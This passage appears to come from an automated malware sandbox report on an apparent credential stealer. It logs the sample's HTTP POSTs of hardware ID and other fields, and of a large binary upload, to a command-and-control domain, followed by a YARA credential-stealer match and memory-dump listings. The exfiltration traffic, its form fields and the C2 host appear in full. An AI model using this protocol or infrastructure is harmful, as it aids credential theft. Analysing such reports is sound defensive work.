2024-10-30 22:11:16 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 39 44 30 41 43 34 45 30 46 34 36 41 44 32 36 42 43 42 38 34 41 44 36 38 45 36 43 34 42 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E89D0AC4E0F46AD26BCB84AD68E6C4B4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 22:11:16 UTC	4637	OUT	Data Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 Data Ascii: +?2+?2+?o?Mp5p
2024-10-30 22:11:16 UTC	1019	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jb8oqikvlpgvlr3dm9gas7072n; expires=Sun, 23-Feb-2025 15:57:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hN7PjOm9PI%2B5H%2BNf%2BOnUSANVgPHXMjWRodZ2QiwrWjbaPQd7lIHn5KPtwkw4qNs4mlnhWOZBr%2Bs0YQwbTqibZzJwVsnsMEOxRBYPonP5fvkbtgzPNMmklCyv4mZ8hoeFgFiULrQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd79b9f84798-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20932&delivery_rate=2625566&cwnd=251&unsent_bytes=0&cid=3f090e7b3e3ba088&ts=708&x=0"
2024-10-30 22:11:16 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a Data Ascii: 11ok 173.254.250.78
2024-10-30 22:11:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49716	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:17 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1225 Host: necklacedmny.store
2024-10-30 22:11:17 UTC	1225	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 39 44 30 41 43 34 45 30 46 34 36 41 44 32 36 42 43 42 38 34 41 44 36 38 45 36 43 34 42 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E89D0AC4E0F46AD26BCB84AD68E6C4B4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 22:11:18 UTC	1018	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=64guhvtj9gqdrn1i08lg404o7h; expires=Sun, 23-Feb-2025 15:57:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hczo4CaPTA65tgNjrD%2FBu%2FxLUa%2Bn0tzvIpmz4u9aKeuzI02UAAXClGqrbTnLAv2qSWgcjcf%2B7K5OrWS2Cbcq9Nu%2Bp62mK2I8FwcptnHIMOmBZxkOqe5scPyLdTcSDZW04PCauaQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd83abbd3aae-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2144&delivery_rate=2291139&cwnd=251&unsent_bytes=0&cid=68e4677d1c53ff25&ts=470&x=0"
2024-10-30 22:11:18 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a Data Ascii: 11ok 173.254.250.78

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49722	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:19 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551686 Host: necklacedmny.store
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 39 44 30 41 43 34 45 30 46 34 36 41 44 32 36 42 43 42 38 34 41 44 36 38 45 36 43 34 42 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E89D0AC4E0F46AD26BCB84AD68E6C4B4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 90 6b 63 6a f2 65 f2 0d cb 85 05 f4 2b 74 4c a6 95 29 24 db a6 b1 ef ac 04 c2 d0 79 58 6b cf 72 0d 1b 23 1f b7 0f 48 a6 fd aa 74 1b ae 14 fc f4 16 19 e1 b2 21 62 02 f7 d3 ec 5c 8e 67 d4 9f ac 58 f3 fd b1 a9 d2 0d 96 73 3a cd 14 bf a4 b0 4b bf 78 9b 54 5b 25 b4 17 c0 8d 89 de 84 29 03 29 c1 ab 51 cd d5 9a 88 99 c2 46 68 f3 12 98 45 6e 8d 46 11 3b 5b 1b 84 d5 4f ba 24 65 16 4d fb 65 8d fa 52 ea 1e ae 9c fc 7c 02 24 a7 87 71 a9 cf 41 df b3 22 dd 06 19 f7 c0 02 57 7d ac 1a 7d 56 12 7c 67 97 72 fe 9d 63 ad 5b e9 81 57 bc 4b 7a 65 e0 35 ff a6 62 23 2c 7f 9a 6f 53 53 1e dd a5 05 d7 06 ec 8b 86 18 68 d6 4c 52 ad ce 08 21 df 0e 6c fe 46 99 92 c0 b3 f9 0b 17 d8 cf c7 3a 27 0c 34 bf 29 d7 b3 51 8d db 11 f3 3f cb a6 bc 54 52 4a 69 95 9f 2d db c1 52 68 77 ff bb e3 8c Data Ascii: kcje+tL)$yXkr#Ht!b\gXs:KxT[%))QFhEnF;[O$eMeR\|$qA"W}}V\|grc[WKze5b#,oSShLR!lF:'4)Q?TRJi-Rhw
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: c2 f2 1f 28 a6 8f 78 b0 f8 64 b4 a4 13 96 e2 96 6d 9b 82 7f 2a 67 83 6f cd 3e d8 89 4f 7d a1 ae 8f 55 1d a1 15 1b ce 96 0c 0d 6a 7d e1 79 52 81 38 10 12 33 fd fd 6b 96 07 70 28 b0 8f 88 e8 23 9e 35 96 f0 10 68 4a a1 62 1e 6e 07 07 09 2e 8c 31 3f ce 85 7d 92 e3 d9 76 cb fd 66 a7 0d 8d 88 bd 72 20 14 62 25 95 df 58 68 1b 32 5e c4 12 15 83 63 34 5a f7 c8 5c 02 16 6f 76 7c e7 0f 4f eb 77 7f 30 6e af dd 30 9a 2e ee b6 7d 6e eb f1 55 63 ba 96 d5 52 fb c6 67 48 43 85 46 c6 c2 dd 83 2c 95 69 46 5e 95 76 35 bd 3e fa 7b 5e d0 bc f3 f4 53 c7 b4 a7 c1 23 d2 e2 6f ac 6c 7d ad b6 6b 6d b6 ae 23 28 a3 b4 c6 4f e2 8e fb de c4 90 da e3 c0 cc 80 62 84 1b 86 01 71 ed 44 a9 ee 73 7d f6 e6 6b 49 d6 2a 58 d2 c5 2d 0c dd 46 83 61 49 00 02 03 fe 05 34 c1 c9 34 0d 7b b0 d4 d0 a2 Data Ascii: (xdmgo>O}Uj}yR83kp(#5hJbn.1?}vfr b%Xh2^c4Z\ov\|Ow0n0.}nUcRgHCF,iF^v5>{^S#ol}km#(ObqDs}kIX-FaI44{
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 55 e0 76 e7 f7 ee df ff ff c3 cd 13 40 be 38 5e f3 27 44 c9 d2 4b 45 42 19 42 cc 5b 69 20 d1 df ff d6 bd 2c c4 a1 48 64 cf 25 c5 61 f5 6f 80 b0 97 68 89 79 89 25 7e 99 94 5b e0 06 67 7e 42 4b 5e bb 84 e2 ca b9 a1 1d 22 ac 1f 41 6d 30 d2 13 03 94 fb 4e cc 4d 15 59 ea cd 25 15 ad 22 d1 39 7e f9 65 38 c9 d0 60 e1 1b de ad 54 80 b6 0f 63 dd ff 1d 15 e3 cc cb 9c da c8 3c 9c ff 7a bd bb 15 b8 78 be 95 00 e1 45 a7 c2 97 da f3 7e 65 dc bb d1 c6 b6 ed 14 b0 ed f7 64 cb f6 a4 08 19 27 1b 4d 45 3a 1b 92 64 b2 e4 8b 4a 00 ab 2c f2 a2 2f 6e d3 48 68 61 ba 7c 41 51 e2 94 8c 85 4d 88 27 cf a1 9c 96 09 90 8b cf 8f 47 f0 1b c7 92 66 b7 4f bf d9 c7 a9 45 95 b6 7b 82 67 b4 af 8d d9 b9 41 89 dd 3e 04 6e 3c 57 95 09 57 1a a1 9f d5 d7 44 65 2d 16 1f a2 95 4b b0 14 45 f6 ac 35 Data Ascii: Uv@8^'DKEBB[i ,Hd%aohy%~[g~BK^"Am0NMY%"9~e8`Tc<zxE~ed'ME:dJ,/nHha\|AQM'GfOE{gA>n<WWDe-KE5
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 98 51 c1 37 4e 64 e1 82 2b 6a 65 08 b1 59 b8 98 32 7a dd 67 d2 b1 b1 a5 cb 10 21 e7 1d 3a 6d 5e ba d6 1a 4f 72 87 0d 6a 32 a7 a3 1f d5 21 21 9f 87 67 6e 90 48 ad d7 e6 23 27 7b 25 b4 48 36 24 7a 72 8a 08 5b a4 f6 ec 02 26 e0 b5 7f 04 75 7a cf ec 43 2d 61 53 83 b5 de 9b 82 9b 3b ad bb c7 3b 9d 3b f4 12 41 b0 55 2a cc 56 e6 36 7c 43 24 97 1c 1b b2 70 88 38 da e2 d0 b8 1b 44 e9 4b b5 6e ed 54 9b 53 40 2c eb 42 7f 62 ff f4 4b 1d f0 a3 b7 21 46 95 f3 5e 46 a9 29 36 e1 99 ea a2 2f 4f 72 6c 16 ed 5b a4 3e 93 d4 ae cf fe fc a7 90 9a f1 12 b5 66 fd ae e3 86 65 4a a9 68 7a 7b 43 09 ef 7c 1a 75 ea 8a 5d e2 bc 1f af 21 6f af 54 a0 75 40 24 65 99 b8 ea 55 a2 bf 3d 71 f9 0a ef de d5 aa 81 e0 81 b3 33 b0 df 9d fe 12 8e 79 4e d5 84 f0 14 8c 28 81 7b 93 84 34 08 e8 7f 0f Data Ascii: Q7Nd+jeY2zg!:m^Orj2!!gnH#'{%H6$zr[&uzC-aS;;;AU*V6\|C$p8DKnTS@,BbK!F^F)6/Orl[>feJhz{C\|u]!oTu@$eU=q3yN({4
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: a0 f2 70 07 68 62 53 0d 35 5b 55 d3 c9 04 e9 b8 4e 3a da ca c7 5e 98 4c 61 dd e9 85 86 2c 12 71 3a ee c1 d1 1b 37 7a 11 80 74 55 eb de 10 e5 98 2a 71 b2 84 4d 61 b6 32 c1 a1 40 16 6c 1d 18 8e 81 72 05 c0 97 ec ae a2 d5 74 48 df 19 b0 c4 49 49 68 54 6e 5a 23 88 95 17 05 f2 7f 5e e2 e4 81 2c 33 f6 c9 cf d8 29 1c 6c d6 8e 03 f9 fa a8 e8 64 2b 03 87 52 a1 c0 a1 88 dc 34 be 68 e4 30 1a 33 6b 5d 43 9b 23 2d d8 c2 8d 3c c4 4e c0 c6 76 1e f8 98 af 51 ed 72 16 79 41 00 fe 65 99 5b 9b 5c 75 89 53 f2 11 7b 9a 2e 2c 76 59 20 e6 fb e8 ce 99 cb cf 2c e5 7b 2f 4c d9 a3 63 79 33 9a a6 d4 4c 59 fd 74 0d cc 7f 5e ab 7b 6f 02 1f fb 01 d1 e4 56 50 37 5b d7 78 cd 65 10 ef 8e 85 37 b2 fb ee b9 1f 18 95 83 23 15 49 67 00 32 c1 2b 2e 06 72 b9 57 fd c6 c6 3e 90 ae 12 49 27 28 14 Data Ascii: phbS5[UN:^La,q:7ztU*qMa2@lrtHIIhTnZ#^,3)ld+R4h03k]C#-<NvQryAe[\uS{.,vY ,{/Lcy3LYt^{oVP7[xe7#Ig2+.rW>I'(
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 9f f0 36 de cd 21 7d c6 20 3b 7d a4 b4 95 97 61 e8 bf 10 b7 be 38 a2 b0 cd 72 c3 bf bc b8 c4 d8 a6 ac 53 2c bc 82 9a fe 9c 59 29 ca 7d 35 99 44 91 d2 d6 f8 25 aa 5d 90 c0 89 ee fa 36 6f 6c 19 6c 29 08 d6 e6 6a b6 1a bc b2 dc d2 aa 4c 42 29 42 c0 49 4a db 76 f1 03 84 83 e8 3d ff b7 22 34 7c c7 af 2b fc f4 a1 2e 59 a3 fc aa f5 1d c7 4a dd ce 4f 08 2c 6c 15 62 42 ac 89 9b 0d 64 5d 3c b6 08 de a9 3c 67 8a 8b 8c d1 bc 46 24 36 b5 32 ee c1 7e b7 38 d0 fe bf b5 82 b2 12 28 ee fb 44 a3 80 31 5a 15 a2 06 9e a1 bb c0 09 91 54 be ed 6f 63 b4 14 de e4 fd 48 ca e3 29 fc e8 6b ac 4d 66 fa 53 78 38 04 72 f2 f1 5f 44 58 25 80 f1 83 f1 6d 90 1c f8 46 81 0f b1 16 57 3d f5 80 f0 83 59 20 66 4f 2d 69 36 b7 22 04 9f 2f 8b 46 17 72 65 2e c4 0d a8 a7 61 19 04 84 5b 57 50 99 17 Data Ascii: 6!} ;}a8rS,Y)}5D%]6oll)jLB)BIJv="4\|+.YJO,lbBd]<<gF$62~8(D1ZTocH)kMfSx8r_DX%mFW=Y fO-i6"/Fre.a[WP
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 18 92 82 17 a3 b9 4e cd b1 08 b5 3d e7 23 b7 c3 b7 17 83 b1 63 d5 ba 91 41 68 86 28 43 78 a2 c4 26 c1 67 db 8e 99 f9 a1 fa ae f3 14 dc 4c 15 f5 8f 90 d9 ae a1 5b 2f ec 0a 0d d8 79 e6 d8 20 2e 6a 58 f4 f7 eb 48 6c 13 8f c3 7a 25 84 eb ee 63 a4 89 07 83 1f d0 c2 a1 31 ab 64 6e c3 14 19 2e 0e c6 1c 17 de c5 62 19 cc e7 7c f3 a2 7f 0f e4 c1 a7 73 6b 38 ef 45 96 b2 ec 13 a9 1a ba 4a 89 de 74 59 9b af 06 dc 12 df 5b b2 c2 12 15 7a 1f db de b6 5a e4 c3 e9 fe e2 26 17 79 77 12 f7 73 c3 e7 e6 e2 46 f4 52 9b bc 42 75 ed 76 d1 b6 d7 49 e2 c7 03 ea f8 48 2a f0 8f 08 56 e5 55 7c 2d c3 e8 10 b1 a5 99 34 46 69 57 e6 12 0b f8 70 fd 17 5d 0c fd 49 37 21 1c 55 c6 c1 3f db d9 29 06 2b 64 6b 64 29 99 43 d4 cc 75 6a 9b 78 8d 0f da 07 88 88 40 17 71 f9 c8 29 a5 f6 54 6c ef aa Data Ascii: N=#cAh(Cx&gL[/y .jXHlz%c1dn.b\|sk8EJtY[zZ&ywsFRBuvIH*VU\|-4FiWp]I7!U?)+dkd)Cujx@q)Tl
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 99 97 94 58 98 94 d4 ba 3f 26 ea a6 7e 64 e5 99 d3 54 a1 ff b8 c4 49 08 cd 97 91 b5 42 d1 cb 63 03 4a 63 fd 0f 4e 3a ba c0 8b ce 2a 91 53 8d 14 73 97 62 75 d7 68 f5 e1 d6 ad 17 bc a0 71 55 cb de ed 72 91 7b df 13 19 e9 56 16 0f 22 46 ab ee ef 8f 5c c9 23 dc e9 db d8 53 1b 54 6d b3 07 d3 af 6e 8f 27 25 b2 f1 35 e6 0c 22 97 04 93 f3 20 f1 63 ca 2a 25 fb 34 52 d5 72 9a 2c c5 44 44 96 76 6d 6b 74 da a1 16 ad 2d df ba 44 d5 6a 54 49 48 6a b6 22 d7 50 58 64 79 fa a8 38 25 08 2d 94 34 e2 e3 4a e5 a2 22 13 b8 55 df 1d f1 07 bd 44 b7 f1 84 34 26 6d 7b 0e 4b 3f ed a6 7d a2 f2 cf b5 e4 03 70 a8 28 4f 56 7a 4e 69 64 c1 2d 34 a2 03 0d 2f 75 ff a7 f4 8c c1 16 5d e6 e7 bd 37 46 74 41 aa 12 c1 e8 ff 6d 00 5b b7 66 f5 ca 81 f6 07 95 27 fe b9 a4 22 b9 49 f3 85 2d ea 9d 90 Data Ascii: X?&~dTIBcJcN:SsbuhqUr{V"F\#STmn'%5" c%4Rr,DDvmkt-DjTIHj"PXdy8%-4J"UD4&m{K?}p(OVzNid-4/u]7FtAm[f'"I-
2024-10-30 22:11:19 UTC	15331	OUT	Data Raw: 85 38 99 b6 ee 8c cb 79 5d 2d ba fc a7 15 3b 5b 8a ed da 96 4c 22 ac d1 b0 56 1a 27 27 fb 5d 25 6e 55 a6 f4 8e 64 a5 a3 61 54 38 ea 5a 34 5d 96 1b 98 26 ac c3 d1 df be 66 7f 2b a3 07 82 33 e1 bc 41 a6 68 92 7e 23 f4 cc ba 65 a6 b5 1a db af 9e 84 a7 16 6e fa a5 b2 6f d9 11 58 e3 b7 24 76 a9 ca 52 d8 ad ef b1 6c ec 2d b5 00 1b 38 02 15 89 82 95 bf 6c ca 39 4e ba a0 16 e6 30 f0 33 75 3e b1 ef 7b 86 17 34 60 74 c3 7a 03 e1 04 68 78 08 ef db 75 f5 6e 6e ed 7a 30 fb af 4d 0d 9f 8c f4 35 32 d3 24 6c 1b 1c 4d d9 f5 df 94 fb aa 9d c3 ee 02 fb e7 ba e4 48 cb 6e 44 ea af 79 58 02 d1 79 bc 25 2e b4 c6 32 df c5 09 07 0d 3b 63 49 6e 0c 38 7c cf c1 c6 45 91 8e fe af 2f 95 52 b8 da f8 37 3b a8 69 4a 29 ff 5a 6d 1b a8 0c e4 8f 99 67 ba 85 f7 f9 20 5b 6a cb d0 d8 be 7f a8 Data Ascii: 8y]-;[L"V'']%nUdaT8Z4]&f+3Ah~#enoX$vRl-8l9N03u>{4`tzhxunnz0M52$lMHnDyXy%.2;cIn8\|E/R7;iJ)Zmg [j
2024-10-30 22:11:20 UTC	1023	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jh899hrqpkeabfje1uc22skoap; expires=Sun, 23-Feb-2025 15:57:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BCZ8pOQFKapUiJVZu7eZNaiLfcPsD%2BM2rHkYI3MFuWCatViTqsvmM1WUCRUR8Uu8wlDLtRX3HAHilaJgWqyrpgvOqKKqYUWbOQHVdBIdR5xY%2BsAHCYVtYu%2FSkX0ULG9KlzYa2E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd8d4d213ab6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1247&sent=214&recv=597&lost=0&retrans=0&sent_bytes=2846&recv_bytes=554169&delivery_rate=2170914&cwnd=251&unsent_bytes=0&cid=09fdc014164765de&ts=1766&x=0"

Target ID:	0
Start time:	18:11:07
Start date:	30/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x240000
File size:	2'977'280 bytes
MD5 hash:	1D66F9ED00F1C6697066BDAF8CDBE977
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	59.5%
Total number of Nodes:	242
Total number of Limit Nodes:	23

Executed Functions

Function 0024EC20 Relevance: 20.4, Strings: 16, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

eI?K, xrefs: 0024ED5F
dc, xrefs: 0024EDC0
jabc, xrefs: 0024ED8F
>M"O, xrefs: 0024ED67
6E+G, xrefs: 0024ED57
E-A/, xrefs: 0024ED27
&A-C, xrefs: 0024ED4F
5Q<S, xrefs: 0024ED6F
7U9W, xrefs: 0024ED77
I)^+, xrefs: 0024ED1F
O9M;, xrefs: 0024ED3F
M%E', xrefs: 0024ED17
6, xrefs: 0024EE5D
8]S_, xrefs: 0024ED87
P!N#, xrefs: 0024ED0F
<Y?[, xrefs: 0024ED7F

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
